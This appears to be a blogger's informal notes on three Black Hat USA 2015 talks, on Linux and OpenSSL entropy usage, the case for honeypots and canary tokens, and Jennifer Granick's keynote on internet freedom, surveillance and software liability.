This was followed by a fun Q&A with Theodora Titonis, Vice President of Mobile at Verac01de.


Recommended reading: The Confidence Code.


 

BHUSA15: Understanding and Managing Entropy Usage

Bruce Potter is a director at KEYW Corporation and was previously the Chief Technologist and cofounder of Ponte Technologies. Sasha Wood is a Senior Software Engineer at KEYW Corporation, with ten years' experience in developing and assessing software systems, and researching classical and quantum computational complexity.

Their research was funded by Whitewood Encryption Systems, with help from great interns.

Their goal was to get a better understanding of how entropy is generated and consumed in the enterprise. There were rants from Linus, but nobody seemed to be looking at the actual source code. They wanted to determine rates of Entropy Production on various systems, determine rates of Entropy Consumpitio of common operations and determine correlation etween entropy demand and supply of random data..  The theme: "No one really understands what's happening with entropy and random number generation"

What uses more entropy? Generating an RSA512 bit key or 1024? They both use the same! Surprisingly, running /bin/ls uses more entropy from the kernel than setting up a TLS connection!

How do we distinguish between entropy vs random numbers? It's a bit of a state of mind, there are several ways to think about it.  Entropy is the uncertainty of an outcome. Randomness is about the quality of that uncertainty from a historical perspective.

Full entropy is 100% random. There are tests that measure entropy, but randomness either is or is not. Entropy has a quantity and randomness has a quality. Think about the simple coin flip. A regular person flipping a coin will have random output, but someone like the magicians Penn & Teller - they can control their flip and the outcome is NOT random.

As long as we have great cryptographic primitives, the RNG will be excellent. In theory.

This is actually really hard to judge without analyzing the source code and doing actual testing. Documentation does not match what's actually in the source (common problem). This testing was done on Linux (note: I missed the version number).

On Linux, there are two PRNGs - one that feeds /dev/random and one that feeds /dev/urandom, but both leverage the same entropy source.

Entropy sources: time/date (very low entropy), Disk IO, Interrupts, and other SW things

There are Hradware RNGs - like Ivy Bridge, that uses thermal noise. There's Entropy Key (shot noise, from USB generator). Some places even use Lava Lamps! (seriously)

Linux maintains a entropy pool, data goes in and then fed out to the PRNGs. It has a maximum amount in the pool, but if you don't have HW behind this - it will never fill up.

Linux has a system call that will tell you how much entropy is in the pool.  But, beware - don't check it with a script! you'll invoke ASLR, etc, which will consume entropy from the pool.

The /dev/random and /dev/urandom is generally close to ero. Entropy is fed from the main pool when necessary.

Unloaded VMs are only generating 2 bits of entropy per second. Bare metal is a big faster. The more loaded the machine is - the more entropy you'll get.

For example, if you ping the machine every .001s, it will generate entropy at 13.92bits/s, as compared to 2.4 bits/s on an unloaded system.

RDRAND is normally unavailable in a VM, however, even on bare metal, kernel entropy estimation was not helped by RDRAND. Turns out,due to recent concerns regarding RDRAND, even though RDRAND can be used to reseed the entropy pool, the entropy estimation is NOT increased by the kerenel...on purpose.

VMs do get starved of entropy, but even bare metal systems aren't great.

Android devices did better than Linux boxes observed.

Oddly, the accelerometer on Androids is *not* used to feed the entropy pool, although it would be a good source of entropy.

/dev/random provides output that is roughly 1:1 bits of entropy to bits of random number, access depletes the kernel entroy estimation and with block if the pool is depleted.

/dev/urandom works differently  if you ask for 64 bits, it tries to get 128, and reduce estimation doesn to 128bits. Will not reduce entropy estimation from the pool if the pool is less than 192 bits. Each read produces a hash which is immediately fed back into the pool.

get_random_bytes() just a wrapper to access /dev/urandom.

Here are somethings that are not random: C's "rand" (a linear congruential generator" - if you know two consecutive outputs, you know ALL the outputs.

Python's randompy - implements a Mersenne Twister. Better than rand(), but still not suitable for crypto operations. Need 650 outputs to break the algorithm. So, better, but not great.

When Linux spawns processes, it spawns ASLR, KCMP and other aspeces of fork/copyprocess() , consume up to 256 bits of entropy each time you start a process.

This is not consistent, though, so more research.
 
OpenSSL maintains its OWN PRNG that is seeded by data from he kernel. This PRNG is pulled from for all cryptographic operations including: generating long term keys, generating ephemeral and session keys, and generating nonces. 

OpenSSl only seeds its internal PRNG once per runtime. No problem for things like RSA 1024 it keys. It's a different situation for long running daemons that link to OpenSSL... like webservers.Apache PFS connection requires 300-800 bits of random numbers. If your application does not restrict this, you will be pulling this data from a source that is never reseeded.

OpenSSL pulls seed from /dev/urandom by default (and stirs in other data taht is basically knowable). OpenSSL does NOT check to see the quality of the entropy when it polls /dev/urandom.

mod_SSLs attempt to generate entropy is not very sophisticated. On every request , it stirs in: date/time (4 bytes), PID, and 256 bytes off the stack.  Date/time is low resolution and guessable, ID is a limited search space, and it always looks at the same place on the stack.

mod_SSL is trying really hard, but not really accomplishing much.

How much entropy goes into each random byte?  It depends...

The researches tested various common actions in OpenSSL. Different operations required different amounts of entropy. When creating keys, you need to find big numbers - there's a lot of testing that goes on to find a prime.

Attacks on PRNGs come under three umbrellas: Control/Knowledge of "enough" entropy sources (like RDRAND), knowledge of teh internal state of the PRNG, and analysis of the PRNG traffic.

By default, the Linux kernel pulls from a variety of sources to create entropy pool, so difficult to control them all. Knowledge of the state of the PRNG is very complex, but not impossible to understand.

The caveat is based on PRNGs being seeded correctly - analysis is showing this is not the case.  So, you can follow NIST's guidance on correctness, and still get this wrong.

The researchers created a WES Entropy Client as a solution to the wild west of entropy generation and distribution. Initial release is for OpenSSL.  Client allows users to select sources of entropy, how to use each source, which PRNG to use, etc.

Currently available at http;//whitewoodencryption.com/

Client is under active development, looking for feedback.


BHUSA15: Bring Back the Honey Pots

Haroon Meer is the founder of Thinkst, and Marco Slaviero is the lead researcher at Thinkst.

Honey pots are not a new concept - there are many previous talks on this. This is basic deception in warfare, another old concept. Check out : Dectpion for the cyber Defender: To Err is Humn; to Deceive, Divine.

Honey pots really got started in 1989 and 1991. In Bill Cheswick's 1989 paper wrote about effectively tracking down an attacker who had broken into his network. This was really one of the first deep dive documents for this. Next was the Cuckoo's Egg by Clifford Stoll (wait, also 1989?), which hit on the themes of vulnerability disclosure ethics and what the NSA is up to. Mr. Stoll also talked about the concept of honey pots.

In 2000, Lance Spitzner launched the Honeynet Project, where we all gained valuable information from the "Know Your Enemy" series.

Think about big recent attacks like at Target, where the hackers lurked for months, before actively attacking. How could that be, if we've had the concepts of honey pots for years to help folks discover when they were being attacked?

Looking at the mailing list traffic on the Honey Pot mailing list - very active in 2003, nearly dying off starting in 2007. Honey pots are just not sexy - how do you demo this?  "Um, it only makes noise when there's a problem, so it mostly does ... nothing" It's easier to sell other technology.

Honey pots have been traditionally pitched badly. They are overrepresented in academic work, doesn't seem like an industry solution.

Studying the attack after it happened doesn't seem interesting or relevant. Honey pots were looking for what was happening, but not focused on finding new attacks.

We need these, though. We can't wait to find out that our network has been exploited when the press contacts them. Verizon noted that 95% (?) of companies only find out about attacks when a 3rd party tells them. That's simply not acceptable.

As a defender - you MUST defend ALL the time. Attackers can come and go

There are a lot of arguments against honey pots:

Isn't this just an arms race?  No, an arms race is like what we saw between the US and USSR, not what we're seeing today between US and North Korea. You have to be at the table, making the attacker work for this.f

Will honey pots just introduce new risk to our organization? No, you can run python on a hardened server, support only minimal protocols. If you get even just one alert, you're better off than you were yesterday.

And, really, come on - we know you have an NT4 server floating around still on your network.  You've already got the risk there, but this is something that you can manage.

"These are painful to deploy! I already have to manage so many things!"  The speakers have solved this with Open Canary (https://canary.tools/) which can deploy in 3 minutes.

The speakers introduced their Open Canary project:
  • Mixed (low + high + ?) interaction honeypot
  • written in python
  • produces high quality signals
  • it's a sensor
  • trivial to deploy and update
OpenCanary can be configured to send you lots, or a few alerts - you can control the noise level.

Watches various protocols, watching for login attempts, NTP, SIP, and Samba.

As the name implies, the code is open source. You can configure and deploy multiple feeds across the network.

You do have to worry about discoverability. You want to make sure they are referenced (like in naming service) and also deploy multiple honey pots so they are more likely to be found.


Of course, there is a problem that hackers might be able to fingerprint the honey pot.  The speakers thinks this is misguided effort. There are ways to detect when the honey pot software running on the system - look for how this system is different than it should be. Is it running a strange service or kernel module?  But we need to draw the distinction: we should not confuse what methods are successful in a lab versus what works in the real world.

Canary Tokens are not new concepts - Spafford & Kim (1994) and Spitzner (2003). People do this for map making, but putting fake cities or points of interest on maps so you can tell when someone has copied it.

Canary tokens are simple unique tags that can be embedded in a  wide number of places, like in a DNS channel.

You can learn more at canarytokens.com

How can tokens help us spot attackers on the network? You can watch a particular README file, and when it gets read - that will trigger the canary token that will send the alert.

You can even deploy a canary token into databases! You can tell if someone is querying on a table or a view. Same with PDF files.

Interesting use of bing ads, etc.  Cool talk!

(sorry if these notes are spotty, the speakers flashed through their slides REALLY fast, it was hard to catch everything).

BHUSA15: The Lifecycle of a Revolution

Jennifer Granick, Director of Civil Liberties at the Stanford Center for Internet and Society.

Jennifer and Jeff Moss (aka Dark Tangent) met at DefCon III in 1995 - they immediately connected, and she became the go-to lawyer for hackers ever since.


We’re seeing an internet that is no longer dominated by the US. This is important, as these other governments that don’t have a bill of rights will get in on making rules to regulate our Internet. Where will we be in 20 years? Will you know who is making the decisions? Computers will be deciding if you get a loan, where your car drives, etc. There will be mistakes, but as long as they are on the edge cases, that’s okay.


Technology was supposed to help us overturn oppressive regimes, but instead we’re seeing the opposite happen. The repressors are centralizing security, creating chokepoints where regulation can happen.  The backdoors and restrictions will be done by the elites and governments with local interest – not global interest.
Who is responsible for deciding who gets security, who gets access to what things on the Internet?

She was inspired by Steven Levy's book, Hackers, which espoused freedom of information and decentralization of information. This empowered people to make decisions on what was right and wrong. The global network would allow us to communicate with anyone, anywhere, any time.

Jennifer attended New College - where students were responsible for their own education. They wanted information to be free, and they wanted to use their freedom of thought to change the world.

She started her career as a lawyer with a deep love of technology, and was upset seeing hackers getting prosecuted for things she considered “pretty neat tricks”. She met a prisoner who was at risk of losing his “time credit” after it was discovered he was hacking the pay phone to get himself and his friends free phone calls. She wanted this to stop. That was in 1995, and she started paying more attention to what was happening.

Meet “Cyberporn” – A Time Magazine expose about what you could find on the Internet. Congress wanted this to stop (nothing gets government more excited than porn) – and they wanted to create an online decency act.  Of course, doing so required assuming that there were no first amendment rights available on the Internet.

John Perry Barlow, founder of the EFF and lyricist for the Grateful Dead wrote:

Governments of the Industrial World, you weary giants of flesh and steel, I come from Cyberspace, the new home of Mind. On behalf of the future, I ask you of the past to leave us alone. You’re not welcome among us. You have no sovereignty where we gather.

The Supreme Court, fortunately, turned over most of the provisions of CDA, except the one provision which specified that the provider did not have to be the police.

The Internet was supposed to make us more free – but that’s not what’s happening anymore out there.

Race, gender and class discrimination seems resilient to change on the Internet.  While Jennifer has always felt welcome, there is too much evidence  to ignore.  Look at our big tech companies, which have 17, 15, or 10% female engineers.

How  is that equality?

There are talented people on all parts of the autism spectrum, with different college (or no college) backgrounds, and at any age – from the very young to the elderly.  Given that, could we lead in equality?

What about Freedom to Tinker?

For example, Mike Lynn was coming to present on new vulnerabilities in Cisco routers at Blackhat. His employer, ISS (Inernet Security Systems), and Cisco decided he should not do the talk and threatened Black Hat Conference to remove the pages from the program referencing Mike’s talk and redo the CDROMs with conference proceedings on them.  Jennifer was his lawyer. Mike gave the talk anyways, but the first thing he did in his talk was resign from ISS.
 
What looks more like censorship than ripping out pages out of a book?

Jennifer also represented Aaron Swartz, who ended up killing himself while being prosecuted.

How do we stop this?

Congress has to stop the “tough on cybercrime” hand waving and actually do something about cyber security.  They have made big prison sentences for violators of this, but when another country like China is behind the attack – nothing is done. China does not go to jail. It’s the little guys that are really hurt by DMCA and CFFAA. We need to get rid of them.

 Already now, algorithms are making decisions about our lives, our money, our jobs – and we do not understand these algorithms.  How do we take advantage of AI and machine learning, without ending up completely out of control.

Who is responsible when software fails?  For the most part, nobody. People are sick and tired of this.

Think about this; what happens when your self driving car crashes?  When your internet connected toaster catches on fire? When hackers can control your car remotely using your OnStar device?

We will end up with software liability. Once we are suing Tesla and GM for their software issues, it will be a small step to start suing software companies.

Jennifer recommends reading the Master Switch, by Tim Wu, which studies the cycle of major technologies. History shows a typical progression of information technologies from somebody’s hobby to somebody’s industry; from jury-rigged contraption to slick production marvel; from a freely accessible channel to one strictly controlled by a single corporation or cartel – from open to closed system.

If we don’t do things differently, the Internet will end up like TV, strongly regulated.

Sadly, there are people on the Internet that suck – 4chan, Nazis, jihadists.  Freedom of speech allows those – if you try to regulate them, you will end up impacting everyone. We must tread carefully.

Jennifer asks: who has ever had a blog? Lots of hands go up. Who still blogs? A few hands go up. She noted, “I used to blog, I don’t anymore, I use the centralized service – Facebook”. Nobody, well, except people in this room, still run their own mail server – they all use gmail.com.  We are giving up the control, we are doing this to ourselves.

When we talk about the “cloud” - is it all happy and free? No, it is actually controlled by a small handful of companies, subject to government regulations (US or otherwise). This creates a centralized point for control and eavesdropping.

The law is not protecting us here – in fact, quite the opposite. For example, we have laws that allow surveillance on foreigners, but loopholes in those laws are being used to spy on US Citizens. Laws are passing to give corporations protection from lawsuits if they turn over information to the US Government.

There is not a lot of case law here, oddly, considering the Internet has been around for awhile.

When there is no warrant requirement, searches can be massive and arbitrary.

The myth is that security and privacy are opposites. Not true! Think about how the putting a lock on a cockpit door provides security, but doesn’t mean privacy is exposed. A gay man in another country needs to keep that information private in order to be secure in his own health and happiness.

The current situation is leading to the security haves and have nots. It’s increasingly about power – and once that happens, the people will lose will be the minorities (religious, ethnic, etc) – those who need security most! In the US, we have the Bill of Rights, so we don’t care enough about this. But, other countries do not have those protections. We need to be the leader to protect the world, but we’re not doing that.

We’re already scanning for terrorist threats, and it’s broadening now into monitoring people that seem to be becoming radicalized. What does that mean? There is no agreement, even from the FBI and psychologists, on what it means to be “becoming radicalized”.  So, now more people are getting observed.

People don’t even realize what the Internet is. In a national survey, more people say that they are using Facebook than reported using the Internet. Of course, Facebook is on the Internet – but it is NOT the Internet. So who is correct their?  Facebook decides what to show you based on some algorithm, the freedom is not there...  The further this goes, the less we will know about the world.

We need to start thinking about decentralizing technology again. We need end to end encryption. We need to be afraid of the right things. People are terrible at assessing risk. People are more afraid of sharks than of cows, but EIGHT times more people die at the hoofs of cows every year than are killed by sharks. (note: WHAT?!?! Now I’m more afraid of cows, I knew they were after me!)

We can use law to provide safeguards where technology doesn’t, but we don’t. Congress is simply not protecting our privacy. We need to push them.

We need to get ready to smash it apart and make something new and better.